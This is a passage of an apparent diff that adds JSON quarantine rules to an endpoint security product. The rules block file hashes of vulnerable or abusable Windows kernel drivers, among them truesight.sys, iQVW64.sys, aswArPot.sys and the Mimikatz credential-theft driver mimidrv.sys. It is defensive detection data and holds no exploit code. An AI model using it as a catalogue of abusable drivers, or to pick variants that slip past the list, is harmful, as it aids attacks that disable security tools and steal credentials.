"2026-03-23T11:45:30.816619Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816625Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a5a4a3c3d3d5a79f3ed703fc56d45011c21f9913001fcbcc43a3f7572cff44ec", + "comment": "Vulnerable Kernel Driver (aka avalueio.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ace92d33-62c8-581d-86c8-80ed8273d96f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456652Z", + "creation_date": "2026-03-23T11:45:30.456655Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456665Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0dd55b4dc7e561dfe413b029673674e2a5381f5f4daede03ddf3484310a6e11", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acecf9c5-e859-5d29-ac36-f2f1c9d83a6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970703Z", + "creation_date": "2026-03-23T11:45:29.970706Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970714Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "200f98655d1f46d2599c2c8605ebb7e335fee3883a32135ca1a81e09819bc64a", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acf0ae4e-9d8d-5232-8ffe-eaddd033dc17", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831585Z", + "creation_date": "2026-03-23T11:45:30.831587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831592Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "606625f34031d5e1ccbb16b336036e8435d17ad575a4198ad36c4cd86b33630e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "acf7be41-3bef-50a2-863f-5e08e2b273ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143308Z", + "creation_date": "2026-03-23T11:45:31.143310Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143315Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff5d3929a5f07a680cd3de28723f6690d813a538c69b28f1253210d0955ed587", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad0251db-787c-5625-82b9-8d3f489fdbc3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478960Z", + "creation_date": "2026-03-23T11:45:30.478963Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6279821bf9ecced596f474c8fc547dab0bddbb3ab972390596bd4c5c7b85c685", + "comment": "Vulnerable Kernel Driver (aka rtcoremini64.sys) [https://www.loldrivers.io/drivers/b9e01a11-6395-4837-a202-0c777d717a43/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad027320-32db-5aaf-85ce-62f37fbb1913", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492214Z", + "creation_date": "2026-03-23T11:45:31.492216Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492222Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5c2c18244fcba7fd61f1c711697451457364fbc9e8bb3638327c106776049b0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad0d112e-a621-51fd-b230-831f25a8b561", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480205Z", + "creation_date": "2026-03-23T11:45:31.480209Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8435df2f25910f5ce3ac9a0c6ec1d3c784e2ea2d02cd600b0d61e22d48b8ad9d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad17b47a-7788-5453-8342-1a7e94ce21fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146420Z", + 
"creation_date": "2026-03-23T11:45:31.146422Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146427Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5240c956d8321d423461dac7cfcc73d1ccc3526c251585036eed33daf40d33c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad19b531-06e9-54a1-b2e5-a051e3eadd3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810629Z", + "creation_date": "2026-03-23T11:45:31.810631Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4912c468ac1757f73ce1dabc7f02d89dd455bd2a9d8da51dd6bae5512967aac3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad223995-021e-5b4a-a785-923f0dc4d652", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615327Z", + "creation_date": "2026-03-23T11:45:29.615329Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615335Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a1d483d6ca994942533fcfe10c11b1725bbb9551e435476453a57ce7ff17029", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad275f03-fe03-503e-80c5-a1e84c1a0c3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976080Z", + "creation_date": "2026-03-23T11:45:29.976084Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976090Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a02b0b4bc2f2cc9034f98d6a35550c56e3e30a09ee16dd61587405a3a92f12ca", + "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad2937dc-8b07-54eb-8763-9bc4f30d6de7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969630Z", + "creation_date": "2026-03-23T11:45:29.969632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969637Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb0767d3b74dd3cdd6bb806b647c61afb187cc055ac9730dc8d43a4e6ea095f9", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad489102-a99d-5477-b260-b0b2635bc8d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823833Z", + "creation_date": "2026-03-23T11:45:31.823835Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823841Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a63aff2747f2d3f20b4c9b2ca1106d901fa0d7c5cd39f9a4e50489c1ccc7c15", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad522b41-052e-5973-a6ec-6a8c3bd097fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830059Z", + "creation_date": "2026-03-23T11:45:30.830061Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "b7fe1e99997e1172bac0d62b1519c52784f586497f86147be79ca3eda8a3a9b4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad5620c2-c060-5049-ad21-3e13700950a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147587Z", + "creation_date": "2026-03-23T11:45:31.147589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f9934c82ece5f1d1f1ad013c969a5bb691006a9a003473a12cae809e280ab58", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad5d44bf-0ff6-5160-9e6d-b3483154073c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816898Z", + "creation_date": "2026-03-23T11:45:30.816900Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816906Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b44dfe8ea675910799fefab7626993926c04bad32091ece3dbdad5add31a6f15", + "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad5dc8a5-2939-5264-9160-26080b181598", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618116Z", + "creation_date": "2026-03-23T11:45:29.618118Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618123Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "747a4dc50915053649c499a508853a42d9e325a5eec22e586571e338c6d32465", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] 
[https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad651037-1a8f-5600-bd47-eac407208934", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981129Z", + "creation_date": "2026-03-23T11:45:29.981131Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d7bfe05792189eaf7193bee85f0c792c33315cfcb40b2e62cc7baef6cafbc5c", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ad67379c-3778-576e-b45c-6ffb795bbd94", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828076Z", + 
"creation_date": "2026-03-23T11:45:31.828078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d200394680f969b902951bec3b04794f63b80feee6cbbf596a0dda1693153087",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad691297-4e28-5fd6-a59e-88e860c5c6b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835555Z",
+ "creation_date": "2026-03-23T11:45:30.835557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835563Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2e56c0054d51b0a3a1493e2bcbe44abac80c783f31377c8896318f9177c3b0b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad75de23-ef40-5718-abc1-35a86666c845",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827125Z",
+ "creation_date": "2026-03-23T11:45:30.827127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827132Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5df280ce9d7e58d1c616dd31b791b6242e760dd08b0ba6ce0a75519ae4e3248",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad77415c-90d8-504d-9557-3afd64f3b62a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832297Z",
+ "creation_date": "2026-03-23T11:45:30.832299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832304Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b39e438dd063696dcb010e39f49601c04b06e603c64b65fa5f1653ab0f31cff8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad7a00b0-f5cc-57f3-808f-b0b8755ba927",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972439Z",
+ "creation_date": "2026-03-23T11:45:29.972441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972447Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1452103306895429c54ba1735800b8c8694c3165cdef32ca12ed6ce348019292",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad832e4c-6586-56c6-b747-6b353cc47f42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145165Z",
+ "creation_date": "2026-03-23T11:45:31.145167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
